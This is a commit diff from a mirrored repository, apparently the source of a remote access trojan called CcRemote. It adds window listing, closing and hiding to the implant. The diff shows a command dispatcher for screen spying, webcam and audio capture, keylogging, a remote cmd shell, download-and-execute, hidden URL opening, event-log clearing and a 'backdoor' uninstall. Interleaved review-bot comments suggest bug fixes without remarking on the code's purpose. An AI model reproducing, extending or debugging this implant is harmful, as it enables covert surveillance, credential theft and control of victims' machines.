mirror of
https://github.com/Cc28256/CcRemote.git
synced 2025-06-08 13:29:50 +00:00
添加了服务端遍历窗口数据的代码与注释
parent
c95afb225a
commit
2cee9bb467
Binary file not shown.
@ -79,8 +79,8 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\shellmanager.cpp(52): warning C4996
|
||||
SystemManager.cpp
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\dialupass.h(62): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(119): warning C4018: “<”: 有符号/无符号不匹配
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(210): warning C4101: “cbNeeded”: 未引用的局部变量
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(137): warning C4018: “<”: 有符号/无符号不匹配
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(228): warning C4101: “cbNeeded”: 未引用的局部变量
|
||||
VideoCap.cpp
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(118): warning C4101: “gCapTureParms”: 未引用的局部变量
|
||||
VideoManager.cpp
|
||||
|
@ -56,23 +56,23 @@ void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
|
||||
case COMMAND_ACTIVED:
|
||||
InterlockedExchange((LONG *)&m_bIsActived, true);
|
||||
break;
|
||||
case COMMAND_LIST_DRIVE: // 文件管理
|
||||
case COMMAND_LIST_DRIVE: // 文件管理
|
||||
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_FileManager,
|
||||
(LPVOID)m_pClient->m_Socket, 0, NULL, false);
|
||||
break;
|
||||
case COMMAND_SCREEN_SPY: // 屏幕查看
|
||||
case COMMAND_SCREEN_SPY: // 屏幕查看
|
||||
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ScreenManager,
|
||||
(LPVOID)m_pClient->m_Socket, 0, NULL, true);
|
||||
break;
|
||||
case COMMAND_WEBCAM: // 摄像头
|
||||
case COMMAND_WEBCAM: // 摄像头
|
||||
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_VideoManager,
|
||||
(LPVOID)m_pClient->m_Socket, 0, NULL);
|
||||
break;
|
||||
case COMMAND_AUDIO: // 摄像头
|
||||
case COMMAND_AUDIO: // 摄像头
|
||||
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_AudioManager,
|
||||
(LPVOID)m_pClient->m_Socket, 0, NULL);
|
||||
break;
|
||||
case COMMAND_SHELL: // 远程sehll
|
||||
case COMMAND_SHELL: // 远程shell-CMD
|
||||
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ShellManager,
|
||||
(LPVOID)m_pClient->m_Socket, 0, NULL, true);
|
||||
break;
|
||||
@ -80,39 +80,43 @@ void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
|
||||
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_KeyboardManager,
|
||||
(LPVOID)m_pClient->m_Socket, 0, NULL);
|
||||
break;
|
||||
case COMMAND_SYSTEM:
|
||||
case COMMAND_SYSTEM: // 进程
|
||||
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SystemManager,
|
||||
(LPVOID)m_pClient->m_Socket, 0, NULL);
|
||||
break;
|
||||
case COMMAND_WSLIST: // 窗口
|
||||
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_WindowManager,
|
||||
(LPVOID)m_pClient->m_Socket, 0, NULL);
|
||||
break;
|
||||
|
||||
case COMMAND_DOWN_EXEC: // 下载者
|
||||
case COMMAND_DOWN_EXEC: // 下载者
|
||||
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager,
|
||||
(LPVOID)(lpBuffer + 1), 0, NULL, true);
|
||||
Sleep(100); // 传递参数用
|
||||
Sleep(100); // 传递参数用
|
||||
break;
|
||||
case COMMAND_OPEN_URL_SHOW: // 显示打开网页
|
||||
case COMMAND_OPEN_URL_SHOW: // 显示打开网页
|
||||
OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL);
|
||||
break;
|
||||
case COMMAND_OPEN_URL_HIDE: // 隐藏打开网页
|
||||
case COMMAND_OPEN_URL_HIDE: // 隐藏打开网页
|
||||
OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE);
|
||||
break;
|
||||
case COMMAND_REMOVE: // 卸载,
|
||||
case COMMAND_REMOVE: // 卸载,
|
||||
UnInstallService();
|
||||
break;
|
||||
case COMMAND_CLEAN_EVENT: // 清除日志
|
||||
case COMMAND_CLEAN_EVENT: // 清除日志
|
||||
CleanEvent();
|
||||
break;
|
||||
case COMMAND_SESSION:
|
||||
CSystemManager::ShutdownWindows(lpBuffer[1]);
|
||||
break;
|
||||
case COMMAND_RENAME_REMARK: // 改备注
|
||||
case COMMAND_RENAME_REMARK: // 改备注
|
||||
SetHostID(m_strServiceName, (LPCTSTR)(lpBuffer + 1));
|
||||
break;
|
||||
case COMMAND_UPDATE_SERVER: // 更新服务端
|
||||
case COMMAND_UPDATE_SERVER: // 更新服务端
|
||||
if (UpdateServer((char *)lpBuffer + 1))
|
||||
UnInstallService();
|
||||
break;
|
||||
case COMMAND_REPLAY_HEARTBEAT: // 回复心跳包
|
||||
case COMMAND_REPLAY_HEARTBEAT: // 回复心跳包
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
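Review bot: The added `case COMMAND_WSLIST:` is one more `m_hThread[m_nThreadCount++] = MyCreateThread(...)` store, and none of the visible cases checks the index, so every such command received advances it and a long-lived session can write past the end of the handle array. The array's declaration is outside this view, so its capacity is an assumption to confirm; if it is a fixed-size member, guard each store, e.g. `if (m_nThreadCount >= _countof(m_hThread)) break;`. Separately, the comment on `COMMAND_AUDIO` still reads `// 摄像头` (webcam), copied from the case above it, and should describe audio. `OnReceive` starts before this hunk, so any check made earlier in the function is not visible here.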
@ -17,9 +17,17 @@
|
||||
// Construction/Destruction
|
||||
//////////////////////////////////////////////////////////////////////
|
||||
|
||||
CSystemManager::CSystemManager(CClientSocket *pClient) : CManager(pClient)
|
||||
CSystemManager::CSystemManager(CClientSocket *pClient, BYTE bHow) : CManager(pClient)
|
||||
{
|
||||
SendProcessList();
|
||||
m_caseSystemIs = bHow;
|
||||
if (m_caseSystemIs == COMMAND_SYSTEM) //如果是获取进程
|
||||
{
|
||||
SendProcessList();
|
||||
}
|
||||
else if (m_caseSystemIs == COMMAND_WSLIST) //如果是获取窗口
|
||||
{
|
||||
SendWindowsList();
|
||||
}
|
||||
}
|
||||
|
||||
CSystemManager::~CSystemManager()
|
||||
@ -28,20 +36,26 @@ CSystemManager::~CSystemManager()
|
||||
}
|
||||
void CSystemManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
|
||||
{
|
||||
|
||||
SwitchInputDesktop();
|
||||
switch (lpBuffer[0])
|
||||
switch (lpBuffer[0])//这里是进程管理接收数据的函数了 判断是哪个命令
|
||||
{
|
||||
case COMMAND_PSLIST:
|
||||
SendProcessList();
|
||||
case COMMAND_PSLIST: //发送进程列表
|
||||
SendProcessList();
|
||||
break;
|
||||
case COMMAND_WSLIST:
|
||||
case COMMAND_WSLIST: //发送窗口列表
|
||||
SendWindowsList();
|
||||
break;
|
||||
case COMMAND_DIALUPASS:
|
||||
SendDialupassList();
|
||||
case COMMAND_DIALUPASS: //保留20200530
|
||||
break;
|
||||
case COMMAND_KILLPROCESS:
|
||||
case COMMAND_KILLPROCESS: //关闭进程
|
||||
KillProcess((LPBYTE)lpBuffer + 1, nSize - 1);
|
||||
case COMMAND_WINDOW_CLOSE: //关闭窗口
|
||||
CloseTheWindow(lpBuffer + 1);
|
||||
break;
|
||||
case COMMAND_WINDOW_TEST: //最大化最小化 隐藏窗口函
|
||||
ShowTheWindow(lpBuffer + 1);
|
||||
break;
|
||||
default:
|
||||
break;
|
||||
}
|
||||
@ -64,14 +78,18 @@ void CSystemManager::SendProcessList()
|
||||
void CSystemManager::SendWindowsList()
|
||||
{
|
||||
UINT nRet = -1;
|
||||
//获取窗口列表数据
|
||||
LPBYTE lpBuffer = getWindowsList();
|
||||
if (lpBuffer == NULL)
|
||||
return;
|
||||
|
||||
//发送遍历到的窗口数据
|
||||
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
|
||||
LocalFree(lpBuffer);
|
||||
}
|
||||
|
||||
|
||||
//保留20200530
|
||||
void CSystemManager::SendDialupassList()
|
||||
{
|
||||
CDialupass pass;
|
||||
@ -280,6 +298,7 @@ LPBYTE CSystemManager::getProcessList()
|
||||
return lpBuffer;
|
||||
}
|
||||
|
||||
//提权
|
||||
bool CSystemManager::DebugPrivilege(const char *PName,BOOL bEnable)
|
||||
{
|
||||
BOOL bResult = TRUE;
|
||||
@ -312,6 +331,7 @@ void CSystemManager::ShutdownWindows( DWORD dwReason )
|
||||
DebugPrivilege(SE_SHUTDOWN_NAME,FALSE);
|
||||
}
|
||||
|
||||
//窗口回调遍历所有窗口
|
||||
bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam)
|
||||
{
|
||||
DWORD dwLength = 0;
|
||||
@ -321,21 +341,27 @@ bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam)
|
||||
|
||||
char strTitle[1024];
|
||||
memset(strTitle, 0, sizeof(strTitle));
|
||||
//获取传进来的窗口句柄的标题
|
||||
GetWindowText(hwnd, strTitle, sizeof(strTitle));
|
||||
|
||||
//判断窗口是否可见,标题是否为空
|
||||
if (!IsWindowVisible(hwnd) || lstrlen(strTitle) == 0)
|
||||
return true;
|
||||
|
||||
|
||||
//如果指针为空的话申请一个堆
|
||||
//(该函数时循环的所以第二次进来就不是空的,用动态的LocalReAlloc改变堆大小实现数据都在一个堆上)
|
||||
if (lpBuffer == NULL)
|
||||
//第一次申请大小为1是因为第一字节为通知控制端标识
|
||||
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1);
|
||||
|
||||
dwLength = sizeof(DWORD) + lstrlen(strTitle) + 1;
|
||||
dwOffset = LocalSize(lpBuffer);
|
||||
|
||||
//计算缓冲区大小
|
||||
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset + dwLength, LMEM_ZEROINIT|LMEM_MOVEABLE);
|
||||
|
||||
//获取窗口的创建者 + 两个memcpy数据结构为 创建者PID + hwnd + 窗口标题 + 0
|
||||
GetWindowThreadProcessId(hwnd, (LPDWORD)(lpBuffer + dwOffset));
|
||||
memcpy((lpBuffer + dwOffset), &hwnd, sizeof(DWORD));
|
||||
memcpy(lpBuffer + dwOffset + sizeof(DWORD), strTitle, lstrlen(strTitle) + 1);
|
||||
|
||||
*(LPBYTE *)lParam = lpBuffer;
|
||||
@ -343,6 +369,8 @@ bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam)
|
||||
return true;
|
||||
}
|
||||
|
||||
|
||||
//获取窗口列表数据
|
||||
LPBYTE CSystemManager::getWindowsList()
|
||||
{
|
||||
LPBYTE lpBuffer = NULL;
|
||||
@ -350,6 +378,27 @@ LPBYTE CSystemManager::getWindowsList()
|
||||
//枚举屏幕上的所有的顶层窗口,轮流地将这些窗口的句柄传递给一个应用程序定义的回调函数。
|
||||
//EnumWindows会一直进行下去,直到枚举完所有的顶层窗口,或者回调函数返回了FALSE.
|
||||
EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)&lpBuffer);
|
||||
|
||||
//数据头填充TOKEN_WSLIST主控端识别
|
||||
lpBuffer[0] = TOKEN_WSLIST;
|
||||
return lpBuffer;
|
||||
}
|
||||
|
||||
|
||||
//关闭窗口
|
||||
void CSystemManager::CloseTheWindow(LPBYTE buf)
|
||||
{
|
||||
DWORD hwnd;
|
||||
memcpy(&hwnd, buf, sizeof(DWORD)); //得到窗口句柄
|
||||
::PostMessage((HWND__ *)hwnd, WM_CLOSE, 0, 0); //向窗口发送关闭消息
|
||||
}
|
||||
|
||||
//显示窗口
|
||||
void CSystemManager::ShowTheWindow(LPBYTE buf)
|
||||
{
|
||||
DWORD hwnd;
|
||||
DWORD dHow;
|
||||
memcpy((void*)&hwnd, buf, sizeof(DWORD)); //得到窗口句柄
|
||||
memcpy(&dHow, buf + sizeof(DWORD), sizeof(DWORD)); //得到窗口处理参数
|
||||
ShowWindow((HWND__ *)hwnd, dHow);
|
||||
}
|
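Review bot: In `CSystemManager::OnReceive`, as the new side reads, `case COMMAND_KILLPROCESS:` has no `break;` after `KillProcess((LPBYTE)lpBuffer + 1, nSize - 1);`, and the commit places `case COMMAND_WINDOW_CLOSE:` directly below it, so a kill-process packet also runs `CloseTheWindow(lpBuffer + 1)` and the first four bytes of the PID list are treated as a window handle. Before this change the fall-through ended in `default:` and was harmless; add `break;` after the `KillProcess` call. In `EnumWindowsProc` the new layout comment says each record is creator PID + hwnd + title, but `GetWindowThreadProcessId` and the first `memcpy` write to the same `lpBuffer + dwOffset` and `dwLength` reserves a single `DWORD`, so the record actually holds the handle's low 32 bits, the title and a NUL; the comment should say that. `getWindowsList` also writes `lpBuffer[0] = TOKEN_WSLIST` without a NULL check, which matters when no visible titled window was enumerated and the callback never allocated; `if (lpBuffer != NULL) lpBuffer[0] = TOKEN_WSLIST;` matches the NULL test already in `SendWindowsList`.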
@ -14,7 +14,7 @@
|
||||
class CSystemManager : public CManager
|
||||
{
|
||||
public:
|
||||
CSystemManager(CClientSocket *pClient);
|
||||
CSystemManager(CClientSocket *pClient, BYTE bHow);//bHow是传进来功能的标志
|
||||
virtual ~CSystemManager();
|
||||
virtual void OnReceive(LPBYTE lpBuffer, UINT nSize);
|
||||
|
||||
@ -22,6 +22,8 @@ public:
|
||||
static bool CALLBACK EnumWindowsProc( HWND hwnd, LPARAM lParam);
|
||||
static void ShutdownWindows(DWORD dwReason);
|
||||
private:
|
||||
BYTE m_caseSystemIs;//构造函数会初始化这个变量,用于区分进程或者窗口的变量
|
||||
|
||||
BOOL GetProcessFullPath(DWORD dwPID, TCHAR pszFullPath[MAX_PATH]);
|
||||
BOOL DosPathToNtPath(LPTSTR pszDosPath, LPTSTR pszNtPath);
|
||||
LPBYTE getProcessList();
|
||||
@ -30,6 +32,8 @@ private:
|
||||
void SendWindowsList();
|
||||
void SendDialupassList();
|
||||
void KillProcess(LPBYTE lpBuffer, UINT nSize);
|
||||
void ShowTheWindow(LPBYTE buf);
|
||||
void CloseTheWindow(LPBYTE buf);
|
||||
};
|
||||
|
||||
#endif // !defined(AFX_SYSTEMMANAGER_H__26C71561_C37D_44F2_B69C_DAF907C04CBE__INCLUDED_)
|
||||
|
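Review bot: The two new private handlers, `ShowTheWindow(LPBYTE buf)` and `CloseTheWindow(LPBYTE buf)`, take no length, unlike `KillProcess(LPBYTE lpBuffer, UINT nSize)` declared just above them, so their bodies cannot check that the packet really carries the 4 or 8 bytes they `memcpy` out of it. Give them the same shape, e.g. `void ShowTheWindow(LPBYTE lpBuffer, UINT nSize);`, and return early when `nSize` is too small. The comment on `m_caseSystemIs` says it distinguishes process mode from window mode, but in the hunks shown on this page it is only assigned and compared inside the constructor; if nothing else reads it, a local would do.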
@ -110,19 +110,35 @@ DWORD WINAPI Loop_KeyboardManager(SOCKET sRemote)
|
||||
return 0;
|
||||
}
|
||||
|
||||
//进程遍历回调函数
|
||||
DWORD WINAPI Loop_SystemManager(SOCKET sRemote)
|
||||
{
|
||||
CClientSocket socketClient;
|
||||
if (!socketClient.Connect(CKernelManager::m_strMasterHost, CKernelManager::m_nMasterPort))
|
||||
return -1;
|
||||
|
||||
CSystemManager manager(&socketClient);
|
||||
CSystemManager manager(&socketClient, COMMAND_SYSTEM);
|
||||
|
||||
socketClient.run_event_loop();
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
//窗口线程回调函数
|
||||
DWORD WINAPI Loop_WindowManager(SOCKET sRemote)
|
||||
{
|
||||
CClientSocket socketClient;
|
||||
if (!socketClient.Connect(CKernelManager::m_strMasterHost, CKernelManager::m_nMasterPort))
|
||||
return -1;
|
||||
|
||||
CSystemManager manager(&socketClient, COMMAND_WSLIST);
|
||||
|
||||
socketClient.run_event_loop();
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
DWORD WINAPI Loop_DownManager(LPVOID lparam)
|
||||
{
|
||||
int nUrlLength;
|
||||
|
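Review bot: `Loop_WindowManager` is a line-for-line copy of `Loop_SystemManager` apart from the constant passed to the `CSystemManager` constructor, so the connect-and-run sequence now exists twice. A small file-local helper taking the `BYTE` mode, called as `return RunSystemManager(COMMAND_WSLIST);` and `return RunSystemManager(COMMAND_SYSTEM);`, would keep the two in step. The header comments call these callback functions (`回调函数`), but as used in `CKernelManager::OnReceive` they are thread entry routines. Both also return `-1` from a `DWORD` function and ignore `sRemote`, which is worth a one-line comment.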
Binary file not shown.
@ -61,6 +61,9 @@ enum
|
||||
COMMAND_WSLIST, // 窗口列表
|
||||
COMMAND_DIALUPASS, // 拨号密码
|
||||
COMMAND_KILLPROCESS, // 关闭进程
|
||||
COMMAND_WINDOW_CLOSE, // 关闭窗口
|
||||
COMMAND_WINDOW_TEST, // 操作窗口
|
||||
|
||||
COMMAND_SHELL, // cmdshell
|
||||
COMMAND_SESSION, // 会话管理(关机,重启,注销, 卸载)
|
||||
COMMAND_REMOVE, // 卸载后门
|
||||
|
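Review bot: `COMMAND_WINDOW_CLOSE` and `COMMAND_WINDOW_TEST` are inserted in the middle of an enum whose members, as far as this hunk shows, carry no explicit values, so `COMMAND_SHELL` and every later command silently shift by two. Both ends of the connection have to be rebuilt from the same header or the command bytes no longer mean the same thing, and anyone decoding captured traffic by command byte has to know which revision of the header produced it. Appending new members at the end of the enum, or giving each member an explicit value, keeps the numbering stable. `COMMAND_WINDOW_TEST` is also a misleading name for what its comment (`操作窗口`) and its handler describe, which is changing a window's show state. The enum's opening lines are outside the hunk.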